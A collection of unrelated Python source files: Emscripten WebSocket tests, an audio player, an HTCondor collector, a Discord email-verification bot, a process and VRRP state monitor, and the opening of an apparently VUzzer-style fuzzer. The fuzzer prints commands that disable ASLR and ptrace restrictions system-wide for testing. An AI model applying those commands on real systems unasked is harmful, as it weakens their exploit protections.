# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59168)
]:
with harness:
open(os.path.join(self.get_dir(), 'websocket_pre.js'), 'w').write('''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js', 'websocket_pre.js', '-s', 'SOCKET_DEBUG=1', '-DSOCKK=12345'], stdout=PIPE, stderr=PIPE)
out = run_js('client.js', engine=NODE_JS, full_output=True)
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
# Test Emscripten WebSockets API to send and receive text and binary messages against an echo server.
# N.B. running this test requires 'npm install ws' in Emscripten root directory
def test_websocket_send(self):
with NodeJsWebSocketEchoServerProcess():
self.btest(path_from_root('tests', 'websocket', 'test_websocket_send.c'), expected='101', args=['-lwebsocket', '-s', 'NO_EXIT_RUNTIME=1', '-s', 'WEBSOCKET_DEBUG=1'])
# Test that native POSIX sockets API can be used by proxying calls to an intermediate WebSockets -> POSIX sockets bridge server
def test_posix_proxy_sockets(self):
# Build the websocket bridge server
run_process(['cmake', path_from_root('tools', 'websocket_to_posix_proxy')])
run_process(['cmake', '--build', '.'])
if os.name == 'nt': # This is not quite exact, instead of "isWindows()" this should be "If CMake defaults to building with Visual Studio", but there is no good check for that, so assume Windows==VS.
proxy_server = os.path.join(self.get_dir(), 'Debug', 'websocket_to_posix_proxy.exe')
else:
proxy_server = os.path.join(self.get_dir(), 'websocket_to_posix_proxy')
with BackgroundServerProcess([proxy_server, '8080']):
with PythonTcpEchoServerProcess('7777'):
# Build and run the TCP echo client program with Emscripten
self.btest(path_from_root('tests', 'websocket', 'tcp_echo_client.cpp'), expected='101', args=['-lwebsocket', '-s', 'PROXY_POSIX_SOCKETS=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
|
player.py
|
import time
import threading
import pyaudio
import numpy as np
_v = np.__version__
__all__ = ["Player"]
class Player(object):
def __init__(self, buffer, chunk_size=None, rate=None, live=None):
self.rate = rate
self.buffer_size = buffer.size / 2
assert chunk_size < self.buffer_size
assert buffer.dtype == np.float32
self.org_buffer = np.asarray(buffer)
self.chunk_size = chunk_size
# self.live = live
self.paused = False
self.i = 0
# buffer
self.now_buffer_index = 0
self.front_buffer = self.org_buffer[:self.buffer_size]
self.back_buffer = self.org_buffer[self.buffer_size:]
self.buffers = [self.front_buffer, self.back_buffer]
# init buffer
self.buffer = self.front_buffer
# def _orgn_swap_buffers(self):
# if self.live:
# b0 = self.buffer[:self.buffer_size]
# else:
# b0 = np.zeros(self.buffer_size, dtype=np.float32)
# self.buffer[:self.buffer_size], self.buffer[self.buffer_size:] = self.buffer[self.buffer_size:], b0
def _swap_buffers(self):
self.now_buffer_index = int(not self.now_buffer_index)
self.buffer = self.buffers[self.now_buffer_index]
def _reset_buffer(self):
self.buffer = self.buffers[self.now_buffer_index]
def _play_chunk(self):
chunk = self.buffer[self.i:self.i + self.chunk_size]
self.stream.write(chunk.tostring())
self.i += self.chunk_size
if self.i >= self.buffer_size:
self.i -= self.buffer_size
self._swap_buffers()
def _play(self):
# Open the stream on the background thread.
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=pyaudio.paFloat32, channels=1, rate=self.rate, output=1)
if self.paused:
self.paused = False
while not self.paused:
self._play_chunk()
def play(self):
if not hasattr(self, '_thread'):
self.i = 0
self._thread = threading.Thread(target=self._play)
self._thread.daemon = True
self._thread.start()
def resume(self, i):
if not hasattr(self, '_thread'):
self.i = i
self._thread = threading.Thread(target=self._play)
self._thread.daemon = True
self._thread.start()
else:
self.i = i
def pause(self):
if self.paused is False:
self.paused = True
time.sleep(2 * float(self.chunk_size) / self.rate)
self.stream.close()
self._thread.join()
del self._thread
def get_nowframe(self):
return self.i + (self.now_buffer_index * self.buffer_size)
def set_nowframe(self, i):
if self.buffer_size <= i:
# Back
self.i = i - self.buffer_size
self.now_buffer_index = 1
elif i < self.buffer_size:
# Front
self.i = i
self.now_buffer_index = 0
self._reset_buffer()
def get_audio(self):
return self.org_buffer
if __name__ == '__main__':
import numpy as np
rate = 44100
buffer_duration = 1.
buffer_size = int(buffer_duration * rate)
chunk_size = 1024
buffer = np.zeros(2 * buffer_size, dtype=np.float32)
t = np.linspace(0., 2 * buffer_duration, 2 * buffer_size)
f0 = 440.
x = np.sin(2 * np.pi * f0 * t) * .1
buffer[:] = x
p = Player(buffer, chunk_size=chunk_size, rate=rate, live=True)
p.play()
p.pause()
|
cscollector.py
|
from multiprocessing import Process
import time
import htcondor
import redis
import json
import config
import logging
def setup_redis_connection():
r = redis.StrictRedis(host=config.redis_host, port=config.redis_port, db=config.redis_db, password=config.redis_password)
return r
def resources_producer(testrun=False, testfile=None):
resource_attributes = ["Name", "Machine", "JobId", "GlobalJobId", "MyAddress", "State", "Activity", "VMType", "MycurrentTime", "EnteredCurrentState", "Start", "RemoteOwner", "SlotType", "TotalSlots"]
sleep_interval = config.machine_collection_interval
collector_data_key = config.collector_data_key
while(True):
try:
condor_resource_dict_list = []
if not testrun:
condor_c = htcondor.Collector()
any_ad = htcondor.AdTypes.Any
condor_resources = condor_c.query(ad_type=any_ad, constraint=True, projection=resource_attributes)
for resource in condor_resources:
r_dict = dict(resource)
if "Start" in r_dict:
r_dict["Start"] = str(r_dict["Start"])
condor_resource_dict_list.append(r_dict)
#logging.debug(condor_resource_dict_list)
#For Unit Testing only:
else:
res_file = open(testfile, 'r')
condor_string = res_file.read()[0:-1] #strip newline
condor_resources = json.loads(condor_string)
for resource in condor_resources:
r_dict = dict(resource)
if "Start" in r_dict:
r_dict["Start"] = str(r_dict["Start"])
condor_resource_dict_list.append(r_dict)
condor_resources = json.dumps(condor_resource_dict_list)
redis_con = setup_redis_connection()
logging.error("Setting condor-resources in redis...")
redis_con.set(collector_data_key, condor_resources)
if(testrun):
return True
time.sleep(sleep_interval)
except Exception as e:
logging.error(e)
logging.error("Error connecting to condor or redis...")
if(testrun):
return False
time.sleep(sleep_interval)
except(SystemExit, KeyboardInterrupt):
return False
def collector_command_consumer(testrun=False):
collector_commands_key = config.collector_commands_key
sleep_interval = config.command_sleep_interval
while(True):
try:
redis_con = setup_redis_connection()
command_string = redis_con.lpop(collector_commands_key)
if command_string is not None:
command_dict = json.loads(command_string)
#execute command
# use htcondor class's send_command function to send condor_off -peaceful to Startd and Master
# order matters here, we need to issue the command to Startd first then Master
# We will need the class ad for the machine found by using ad = Collector.locate(...)
# then do htcondor.send_command(ad=ad, dc=htcondor.DaemonCommands.DaemonsOffPeaceful, target="-daemon Startd")
# htcondor.send_command(ad=ad, dc=htcondor.DaemonCommands.DaemonsOffPeaceful, target="-daemon Master")
# may not need the target
#need to get machine identifier out of command
machine_name = command_dict['machine_name'].encode('ascii','ignore')
command = command_dict['command']
if command == "condor_off":
condor_c = htcondor.Collector()
logging.info("getting machine ads for %s" % machine_name)
startd_ad = condor_c.locate(htcondor.DaemonTypes.Startd, machine_name)
logging.info("found startd.. locating master")
master_machine_name = machine_name.split("@")[1]
master_ad = condor_c.locate(htcondor.DaemonTypes.Master, master_machine_name)
logging.info("Ads found, issuing condor_off commands...")
htcondor.send_command(startd_ad, htcondor.DaemonCommands.SetPeacefulShutdown)
htcondor.send_command(master_ad, htcondor.DaemonCommands.SetPeacefulShutdown)
if(testrun):
return True
else:
logging.error("Unrecognized command")
if(testrun):
return False
else:
logging.info("No command in redis list, begining sleep interval...")
#only sleep if there was no command
if(testrun):
return False
time.sleep(sleep_interval)
except Exception as e:
logging.error("Failure connecting to redis or executing condor command...")
logging.error(e)
if(testrun):
return False
time.sleep(sleep_interval)
except(SystemExit, KeyboardInterrupt):
return False
if __name__ == '__main__':
logging.basicConfig(filename=config.collector_log_file,level=logging.DEBUG)
processes = []
p_resource_producer = Process(target=resources_producer)
p_command_consumer = Process(target=collector_command_consumer)
processes.append(p_resource_producer)
processes.append(p_command_consumer)
# Wait for keyboard input to exit
try:
for process in processes:
process.start()
while(True):
for process in processes:
if not process.is_alive():
logging.error("%s process died!" % process.name)
logging.error("Restarting %s process...")
process.start()
time.sleep(1)
time.sleep(10)
except (SystemExit, KeyboardInterrupt):
logging.error("Caught KeyboardInterrupt, shutting down threads and exiting...")
for process in processes:
try:
process.join()
except:
logging.error("failed to join process %s" % process.name)
|
bot.py
|
import logging
import threading
import asyncio
import unicodedata
from decouple import config
import discord
from . import xkcd
from discord.utils import get
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
from .utils import send_verify_mail
intents = discord.Intents.all()
intents.presences = False
TOKEN = config("DISCORD_TOKEN", default="")
CSUA_GUILD_ID = config("TEST_GUILD", default=784902200102354985, cast=int)
CSUA_PHILBOT_CLIENT_ID = config("BOT_ID", default=737930184837300274, cast=int)
HOSER_ROLE_ID = config("TEST_ROLE", default=785418569412116513, cast=int) # Verified
DEBUG_CHANNEL_ID = config("DEBUG_CHANNEL", default=788989977794707456, cast=int)
TIMEOUT_SECS = 10
logger = logging.getLogger(__name__)
class CSUAClient(discord.Client):
async def on_ready(self):
print(f"{self.user} has connected to Discord")
self.is_phillip = self.user.id == CSUA_PHILBOT_CLIENT_ID
if self.is_phillip:
print("Phillip is in the Office")
self.csua_guild = get(self.guilds, id=CSUA_GUILD_ID)
self.test_channel = get(self.csua_guild.channels, id=DEBUG_CHANNEL_ID)
self.hoser_role = get(self.csua_guild.roles, id=HOSER_ROLE_ID)
# if self.csua_guild is not None and self.test_channel is not None and self.hoser_role is not None:
# await self.test_channel.send("booting up successfully into phillip_debug channel")
async def verify_member_email(self, user):
channel = user.dm_channel
def check_msg(msg):
return msg.channel == channel
got_email = False
while not got_email:
msg = await self.wait_for("message", check=check_msg)
try:
validate_email(msg.content)
if "@berkeley.edu" in msg.content:
got_email = True
await channel.send(
f"Sending a an email to verify {user.name} to {msg.content}"
)
send_verify_mail(msg.content, user.name + "#" + user.discriminator)
else:
await channel.send(
f"{msg.content} is not a berkeley email. Please fix this"
)
except ValidationError as e:
await channel.send(
f"{msg.content} is not a valid email. Please try again. Details: {e}"
)
async def on_message(self, message):
if message.author == self.user:
return
# Reading rules and verification
msg = message.content.lower()
if "hkn" in msg and "ieee" in msg:
await message.channel.send("Do I need to retrieve the stick?")
if "is typing" in msg:
await message.channel.send("unoriginal")
if msg.count("cpma") >= 2:
for emoji in emoji_letters("wtfiscpma"):
await message.add_reaction(emoji)
elif "based" in msg:
for emoji in emoji_letters("based"):
await message.add_reaction(emoji)
await message.add_reaction("😎")
elif "tree" in msg or "stanford" in msg or "stanfurd" in msg:
emoji = unicodedata.lookup(
"EVERGREEN TREE"
) # todo: add official <:tree:744335009002815609>
await message.add_reaction(emoji)
elif "drip" in msg or "👟" in msg or "🥵" in msg:
for emoji in emoji_letters("drip"):
await message.add_reaction(emoji)
await message.add_reaction("👟")
if "!xkcd" in msg:
# Validate "!xkcd" command
if xkcd.is_valid_xkcd_command(msg):
await xkcd.get_xkcd(message)
else:
await message.channel.send("Please ensure that your command is properly formatted. Type `!xkcd -help` for more information.")
async def on_member_join(self, member):
msg = await member.send(
"Welcome to the CSUA discord server! First, read the rules in #landing-zone. Thumbs up this message if you agree"
)
await self.test_channel.send(f"Sent initial discord message to {member}")
def check_thumb(react, _):
return react.message == msg and str(react.emoji) == "👍" # thumbs
await self.wait_for("reaction_add", check=check_thumb)
await self.test_channel.send(f"{member} read rules")
await member.send(
"Verify your berkeley.edu email to gain access. First, please type your email. Please contact a moderator if you have any issues."
)
await self.test_channel.send(f"{member} was prompted for email")
await self.verify_member_email(member)
if self.is_phillip:
await self.test_channel.send(f"{member} was sent registration email")
def emoji_letters(chars):
return [unicodedata.lookup(f"REGIONAL INDICATOR SYMBOL LETTER {c}") for c in chars]
class CSUABot:
"""
Wraps CSUAClient by abstracting thread and event loop logic.
All the discord.Client coroutines must be called using
`asyncio.run_coroutine_threadsafe` because the client is running inside an
event loop in a separate thread. Event loops are one per-thread, and Django
can't handle async code, so a separate thread is used instead.
"""
def __init__(self):
self.loop = asyncio.new_event_loop()
self.thread = threading.Thread(target=self._start, daemon=True)
self.running = True
self.thread.start()
def _start(self):
asyncio.set_event_loop(self.loop)
self.client = CSUAClient(intents=intents)
try:
self.loop.run_until_complete(self.client.start(TOKEN))
finally:
self.loop.run_until_complete(self.client.logout())
self.loop.close()
def promote_user_to_hoser(self, tag):
if not hasattr(self.client, "csua_guild"):
client = self.client
print(client)
member = self.client.csua_guild.get_member_named(tag)
if member:
asyncio.run_coroutine_threadsafe(
member.add_roles(self.client.hoser_role), self.loop
).result(TIMEOUT_SECS)
asyncio.run_coroutine_threadsafe(
self.client.test_channel.send(f"verified {tag}"), self.loop
).result(TIMEOUT_SECS)
return True
return False
if TOKEN:
csua_bot = CSUABot()
else:
csua_bot = None
|
local_state_collector.py
|
"""Collecting the states of the local system"""
from datetime import datetime
import os
import re
import signal
import threading
import time
import psutil
import yaml
from forch.proto.process_state_pb2 import ProcessState
from forch.proto.shared_constants_pb2 import State
from forch.proto.system_state_pb2 import StateSummary
from forch.utils import dict_proto, get_logger
LOGGER = get_logger('lstate')
_PROC_ATTRS = ['cmdline', 'cpu_times', 'cpu_percent', 'memory_info']
class LocalStateCollector:
"""Storing local system states"""
def __init__(self, config, cleanup_handler, active_state_handler, metrics):
self._state = {'processes': {}, 'vrrp': {}}
self._process_state = self._state['processes']
self._process_state['connections'] = {}
self._vrrp_state = self._state['vrrp']
self._last_error = {}
self._current_time = None
self._conn_state = None
self._conn_state_count = 0
self._metrics = metrics
self._lock = threading.Lock()
self._target_procs = config.processes
self._check_vrrp = config.check_vrrp
self._connections = config.connections
self._process_interval = config.scan_interval_sec or 60
self._cleanup_handler = cleanup_handler
self._active_state_handler = active_state_handler
LOGGER.info('Scanning %s processes every %ds',
len(self._target_procs), self._process_interval)
def initialize(self):
"""Initialize LocalStateCollector"""
if not self._check_vrrp:
self._vrrp_state['is_master'] = True
self._active_state_handler(State.active)
self.start_process_loop()
def get_process_summary(self):
"""Return a summary of process table"""
process_state = self.get_process_state()
return dict_proto({
'state': process_state.process_state,
'detail': process_state.process_state_detail,
'change_count': process_state.process_state_change_count,
'last_update': process_state.process_state_last_update,
'last_change': process_state.process_state_last_change
}, StateSummary)
def get_process_state(self):
"""Get the states of processes"""
with self._lock:
return dict_proto(self._process_state, ProcessState)
def _check_process_info(self):
"""Check the raw information of processes"""
process_state = self._process_state
process_map = {}
procs = self._get_target_processes()
broken = []
# fill up process info
for target_name in self._target_procs:
state_map = process_map.setdefault(target_name, {})
proc_list = procs.get(target_name, [])
target_count = self._target_procs[target_name].count or 1
state, detail = self._extract_process_state(target_name, target_count, proc_list)
state_map['detail'] = detail
if state:
state_map['state'] = State.healthy
self._metrics.update_var('process_state', 1, labels=[target_name])
state_map.update(state)
self._last_error.pop(target_name, None)
continue
state_map['state'] = State.broken
self._metrics.update_var('process_state', 0, labels=[target_name])
if detail != self._last_error.get(target_name):
LOGGER.error(detail)
self._last_error[target_name] = detail
broken.append(target_name)
process_state['processes'] = process_map
process_state['process_state_last_update'] = self._current_time
old_state = process_state.get('process_state')
state = State.broken if broken else State.healthy
old_state_detail = process_state.get('process_state_detail')
state_detail = 'Processes in broken state: ' + ', '.join(broken) if broken else ''
if state != old_state or state_detail != old_state_detail:
state_change_count = process_state.get('process_state_change_count', 0) + 1
LOGGER.info('process_state #%d is %s: %s', state_change_count, state, state_detail)
process_state['process_state'] = state
process_state['process_state_detail'] = state_detail
process_state['process_state_change_count'] = state_change_count
process_state['process_state_last_change'] = self._current_time
def _get_target_processes(self):
"""Get target processes"""
procs = {}
for proc in psutil.process_iter(attrs=_PROC_ATTRS):
cmd_line_str = ' '.join(proc.info['cmdline'])
for target_process_name, target_process_cfg in self._target_procs.items():
proc_list = procs.setdefault(target_process_name, [])
if re.search(target_process_cfg.regex, cmd_line_str):
proc_list.append(proc)
return procs
def _extract_process_state(self, proc_name, proc_count, proc_list):
"""Fill process state for a single process"""
if len(proc_list) != proc_count:
return None, f"Process {proc_name}: number of process ({len(proc_list)}) " \
f"does not match target count ({proc_count})"
old_proc_map = self._process_state.get('processes', {}).get(proc_name, {})
proc_map = {}
cmd_line = ' '.join(proc_list[0].info['cmdline']) if len(proc_list) == 1 else 'multiple'
proc_map['cmd_line'] = cmd_line
create_time_max = max(proc.create_time() for proc in proc_list)
create_time = datetime.fromtimestamp(create_time_max).isoformat()
proc_map['create_time'] = create_time
proc_map['create_time_last_update'] = self._current_time
if create_time != old_proc_map.get('create_time'):
change_count = old_proc_map.get('create_time_change_count', 0) + 1
LOGGER.info('create_time #%d for %s: %s', change_count, proc_name, create_time)
proc_map['create_time_change_count'] = change_count
proc_map['create_time_last_change'] = self._current_time
try:
self._aggregate_process_stats(proc_map, proc_list)
except Exception as e:
return None, f'Error in extracting info for process {proc_name}: {e}'
cpu_percent_threshold = self._target_procs[proc_name].cpu_percent_threshold
if cpu_percent_threshold and proc_map['cpu_percent'] > cpu_percent_threshold:
LOGGER.warning(
'CPU percent of process %s is %.2f, exceeding threshold %.2f',
proc_name, proc_map['cpu_percent'], cpu_percent_threshold)
return proc_map, f'CPU usage is higher than threshold {cpu_percent_threshold}'
return proc_map, None
def _aggregate_process_stats(self, proc_map, proc_list):
cpu_time_user = 0.0
cpu_time_system = 0.0
cpu_time_iowait = None
cpu_percent = 0.0
memory_rss = 0.0
memory_vms = 0.0
for proc in proc_list:
cpu_time_user += proc.info['cpu_times'].user
cpu_time_system += proc.info['cpu_times'].system
if hasattr(proc.info['cpu_times'], 'iowait'):
if not cpu_time_iowait:
cpu_time_iowait = 0.0
cpu_time_iowait += proc.cpu_times().iowait
cpu_percent += proc.info['cpu_percent']
memory_rss += proc.info['memory_info'].rss / 1e6
memory_vms += proc.info['memory_info'].vms / 1e6
proc_map['cpu_times_s'] = {}
proc_map['cpu_times_s']['user'] = cpu_time_user / len(proc_list)
proc_map['cpu_times_s']['system'] = cpu_time_system / len(proc_list)
if cpu_time_iowait:
proc_map['cpu_times_s']['iowait'] = cpu_time_iowait / len(proc_list)
proc_map['cpu_percent'] = cpu_percent / len(proc_list)
proc_map['memory_info_mb'] = {}
proc_map['memory_info_mb']['rss'] = memory_rss / len(proc_list)
proc_map['memory_info_mb']['vms'] = memory_vms / len(proc_list)
def _check_connections(self):
connections = self._fetch_connections()
connection_info = self._process_state['connections']
connection_info['local_ports'] = {
str(port): self._extract_conn(connections, port) for port in self._connections
}
conn_list = []
for port_info in connection_info['local_ports'].values():
for foreign_address in port_info['foreign_addresses']:
conn_list.append(foreign_address)
conn_list.sort()
conn_state = str(conn_list)
if conn_state != self._conn_state:
self._conn_state = conn_state
self._conn_state_count += 1
LOGGER.info('conn_state #%d: %s', self._conn_state_count, conn_state)
connection_info['detail'] = conn_state
connection_info['change_count'] = self._conn_state_count
connection_info['last_change'] = self._current_time
connection_info['last_update'] = self._current_time
def _fetch_connections(self):
connections = {}
with os.popen('netstat -npa 2>/dev/null') as lines:
for line in lines:
if 'ESTABLISHED' in line:
try:
parts = line.split()
local_address = parts[3]
local_parts = local_address.split(':')
local_port = int(local_parts[-1])
foreign_address = parts[4]
connections[foreign_address] = {
'local_port': local_port,
'process_info': parts[6]
}
except Exception as e:
LOGGER.error('Processing netstat entry: %s', e)
return connections
def _extract_conn(self, connections, port):
foreign_addresses = {}
process_entry = None
for foreign_address in connections:
entry = connections[foreign_address]
if entry['local_port'] == port:
new_process_entry = entry['process_info']
if process_entry and new_process_entry != process_entry:
LOGGER.error('Insonsistent process entry for %s: %s != %s',
port, process_entry, new_process_entry)
process_entry = new_process_entry
foreign_addresses[foreign_address] = {
'established': 'now'
}
return {
'process_entry': process_entry,
'foreign_addresses': foreign_addresses
}
def _check_vrrp_info(self):
"""Get vrrp info"""
try:
if not self._check_vrrp:
return
with open('/var/run/keepalived.pid') as pid_file:
pid = int(pid_file.readline())
os.kill(pid, signal.SIGUSR2)
time.sleep(1)
with open('/tmp/keepalived.stats') as stats_file:
stats_file.readline()
stats = yaml.safe_load(stats_file)
self._vrrp_state.update(self._extract_vrrp_state(stats))
active_state = State.active if self._vrrp_state['is_master'] else State.inactive
self._active_state_handler(active_state)
except Exception as e:
LOGGER.error("Cannot get VRRP info, setting controller to inactive: %s", e)
self._active_state_handler(State.broken)
def _extract_vrrp_state(self, stats):
"""Extract vrrp state from keepalived stats data"""
vrrp_map = {'state': State.healthy}
vrrp_erros = []
old_vrrp_map = self._state.get('vrrp', {})
became_master = int(stats['Became master'])
released_master = int(stats['Released master'])
vrrp_map['is_master'] = became_master > released_master
vrrp_map['is_master_last_update'] = self._current_time
if vrrp_map['is_master'] != old_vrrp_map.get('is_master'):
vrrp_map['is_master_last_change'] = self._current_time
is_master_change_count = old_vrrp_map.get('is_master_change_count', 0) + 1
LOGGER.info('is_master #%d: %s', is_master_change_count, vrrp_map['is_master'])
vrrp_map['is_master_change_count'] = is_master_change_count
if not vrrp_map['is_master']:
self._cleanup_handler()
for error_type in ['Packet Errors', 'Authentication Errors']:
for error_key, error_count in stats.get(error_type, {}).items():
if int(error_count) > 0:
vrrp_map['state'] = State.broken
vrrp_erros.append(error_key)
vrrp_map['state_last_update'] = self._current_time
if vrrp_map['state'] != old_vrrp_map.get('state'):
vrrp_map['state_last_change'] = self._current_time
state_change_count = old_vrrp_map.get('state_change_count', 0) + 1
LOGGER.info('vrrp_state #%d: %s', state_change_count, vrrp_map['state'])
vrrp_map['state_change_count'] = state_change_count
return vrrp_map
def _periodic_check_local_state(self):
"""Periodically gather local state"""
with self._lock:
self._current_time = datetime.now().isoformat()
self._check_process_info()
self._check_vrrp_info()
self._check_connections()
threading.Timer(self._process_interval, self._periodic_check_local_state).start()
def start_process_loop(self):
"""Start a loop to periodically gather local state"""
threading.Thread(target=self._periodic_check_local_state, daemon=True).start()
|
runfuzzer.py
|
import subprocess
import shlex
import time
import threading
from threading import Timer
import config
import pickle
import os
import operators
import random
from operator import itemgetter
import time
import shutil
import inspect
import glob
import sys
from collections import Counter
from datetime import datetime
import binascii as bina
import copy
import re
import hashlib
import signal
import gautils as gau
#import gautils_new as gau_new
import mmap
import BitVector as BV
import argparse
#config.MOSTCOMFLAG=False # this is set once we compute taint for initial inputs.
libfd=open("image.offset","r+b")
libfd_mm=mmap.mmap(libfd.fileno(),0)
def signal_handler(sig, frame):
print('[*] User terminated the process...')
if config.START_TIME != 0:
print "[**] Totol time %f sec."%(time.time() -config.START_TIME,)
print "[**] Fuzzing done. Check %s to see if there were crashes.."%(config.ERRORS,)
exit(0)
def get_min_file(src):
files=os.listdir(src)
first=False
minsize=0
for fl in files:
tfl=os.path.join(src,fl)
tsize=os.path.getsize(tfl)
if first == False:
minsize=tsize
first = True
else:
if tsize < minsize:
minsize=tsize
return minsize
def check_env():
''' this function checks relevant environment variable that must be set before we stat our fuzzer..'''
if os.getenv('PIN_ROOT') == None:
gau.die("PIN_ROOT env is not set. Run export PIN_ROOT=path_to_pin_exe")
fd1=open("/proc/sys/kernel/randomize_va_space",'r')
b=fd1.read(1)
fd1.close()
if int(b) != 0:
gau.die("ASLR is not disabled. Run: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space")
fd=open("/proc/sys/kernel/yama/ptrace_scope",'r')
b=fd.read(1)
fd.close()
if int(b) != 0:
gau.die("Pintool may not work. Run: echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope")
if os.path.ismount(config.BASETMP)==False:
tmp=raw_input("It seems that config.BASETMP is not mounted as tmpfs filesystem. Making it a tmpfs may give you gain on execution speed. Press [Y/y] to mount it OR press [N/n] to continue.")
if tmp.upper() == "Y":
print "run: sudo mount -t tmpfs -o size=1024M tmpfs %s"%config.BASETMP
raise SystemExit(1)
#gau.die("config.BASETMP is not mounted as tmpfs filesystem. Run: sudo mkdir /mnt/vuzzer , followed by sudo mount -t tmpfs -o size=1024M tmpfs /mnt/vuzzer")
def run(cmd):
#print "[*] Just about to run ", ' '.join(cmd)
proc = subprocess.Popen(" ".join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout, stderr = proc.communicate()
lava_code = 0
if config.LAVA == True and (b"Successfully triggered bug " in stdout):
for l in stdout.split(b"\n"):
if l[0:5] == b"Succe":
lava_code = int(l.split(b" ")[3][:-1])
return (-1, lava_code)
tmpo = open("run_bb.out", "w")
tmpo.write(stderr)
tmpo.close()
return (proc.returncode, lava_code)
def sha1OfFile(filepath):
with open(filepath, 'rb') as f:
return hashlib.sha1(f.read()).hexdigest()
def bbdict(fn):
with open(fn,"r") as bbFD:
bb = {}
funcset = set()
flag = 0
for ln in bbFD:
if flag == 0:
if "funclist" in ln:
flag = 1
funclist = []
continue
tLine = ln.split()
bbadr=int(tLine[0],0)
bbfr=int(tLine[1],0)
bb[bbadr] = bbfr
else:
try:
funcname, funcoffset = tuple(ln.strip().split(","))
except :
#retry
funcset = set()
config.OFFSET_FUNCNAME = dict()
bb = {}
flag = 0
continue
if funcname in funcset:
continue
funcset.add(funcname)
config.OFFSET_FUNCNAME[long(funcoffset[2:], 16)] = funcname
record_funcexec(funcset)
return bb
def form_bitvector(bbdict):
''' This function forms bit vector for each trace and append them to config.TEMPTRACE list. '''
newbb=0
temp=set()
for bbadr in bbdict:
temp.add(bbadr)
if bbadr not in config.BBSEENVECTOR:
#added for bit vector formation
newbb +=1
config.BBSEENVECTOR.append(bbadr)
tbv=BV.BitVector(size=(len(config.BBSEENVECTOR)))
if newbb == 0:
for el in temp:
tbv[config.BBSEENVECTOR.index(el)]=1
config.TEMPTRACE.append(tbv.deep_copy())
else:
for bvs in config.TEMPTRACE:
bvs.pad_from_right(newbb)
for el in temp:
tbv[config.BBSEENVECTOR.index(el)]=1
config.TEMPTRACE.append(tbv.deep_copy())
del tbv
def form_bitvector2(bbdict, name, source, dest):
''' This function forms bit vector for a given bbdict trace for an input name, using the vector info from souce, updates the source and finally append to dest dict'''
newbb=0
temp=set()
for bbadr in bbdict:
temp.add(bbadr)
if bbadr not in source:
#added for bit vector formation
newbb +=1
source.append(bbadr)
tbv=BV.BitVector(size=(len(source)))
if newbb == 0:
for el in temp:
tbv[source.index(el)]=1
dest[name]=tbv.deep_copy()
else:
for bvs in dest.itervalues():
bvs.pad_from_right(newbb)
for el in temp:
tbv[source.index(el)]=1
dest[name]=tbv.deep_copy()
del tbv
def gen_bitvector(bbdict, source):
''' This function forms bit vector for a given bbdict trace for an input name, using the vector info from souce, updates the source and finally append to dest dict'''
newbb=0
temp=set()
for bbadr in bbdict:
temp.add(bbadr)
if bbadr not in source:
#added for bit vector formation
newbb +=1
source.append(bbadr)
tbv=BV.BitVector(size=(len(source)))
if newbb == 0:
for el in temp:
tbv[source.index(el)]=1
else:
for bvs in config.SPECIAL_BITVECTOR:
bvs.pad_from_right(newbb)
for el in temp:
tbv[source.index(el)]=1
return tbv
def calculate_error_bb():
''' this function calculates probably error handling bbs. the heuristic is:
if a bb is appearing N% of the traces and it is not in the traces of valid inputs, it indicates a error handling bb.'''
erfd=open("errorbb.out",'w')
perc=(config.BBPERCENT/100)*config.POPSIZE
sn=len(config.BBSEENVECTOR)
tbv=BV.BitVector(size=sn)
tbv[-1]=1
for i in range(sn):
print "[*] cal error bb ",i,"/",sn
tbv=tbv>>1
for tr in config.TEMPTRACE:
count =0
tt = tr & tbv
if tt.count_bits() == 1:
count +=1
if count > perc and config.BBSEENVECTOR[i] not in config.GOODBB:
config.TEMPERRORBB.add(config.BBSEENVECTOR[i])
for bbs in config.TEMPERRORBB:
erfd.write("0x%x\n"%(bbs,))
erfd.close()
del tt
del tbv
def execute(tfl):
bbs={}
args=config.SUT % tfl
runcmd=config.BBCMD+args.split(' ')
#print ' '.join(runcmd)
try:
os.unlink(config.BBOUT)
except:
pass
retc, lava_code = run(runcmd)
#check if loading address was changed
#liboffsetprev=int(config.LIBOFFSETS[1],0)
if config.LIBNUM == 2:
if config.BIT64 == False:
liboffsetcur=int(libfd_mm[:10],0)
else:
liboffsetcur=int(libfd_mm[:18],0)
libfd_mm.seek(0)
if liboffsetcur != int(config.LIBOFFSETS[1],0):
#print "Load address changed!"
gau.die("load address changed..run again!")
# open BB trace file to get BBs
bbs = bbdict(config.BBOUT)
if config.CLEANOUT == True:
gau.delete_out_file(tfl)
if len(bbs) == 0:
print ("[**] Error : # of executed BB is zero " )
exit(80)
print ("[**] # of executed BB : " + str(len(bbs)))
return (bbs,retc,lava_code)
def get_hexStr(inp):
''' This functions receives a hex string (0xdddddd type) and returns a string of the form \xdd\xdd..... Also, we need to take care of endianness. it it is little endian, this string needs to be reversed'''
if len(inp[2:])%2 != 0:
r=bina.unhexlify('0'+inp[2:])
else:
r= bina.unhexlify(inp[2:])
if config.ARCHLIL==True:
return r[::-1]
else:
return r
#return bina.unhexlify('0'+inp[2:])
#return bina.unhexlify(inp[2:])
def isNonPrintable(hexstr):
nonprint=['\x0a','\x0d']
if hexstr in nonprint:
return True
else:
return False
def execute2(tfl,fl, is_initial=0):
'''tfl : absolute path of input, fl : given path, '''
if config.SUT[0] != '\\':
args= os.path.abspath(os.path.join(os.getcwd(), config.SUT)) % tfl
else:
args= config.SUT % tfl
args='\"' + args + '\"' # For cmd shell
pargs=config.PINTNTCMD[:]
if is_initial == 1:
runcmd = [pargs[0], args, fl, "0"]
else:
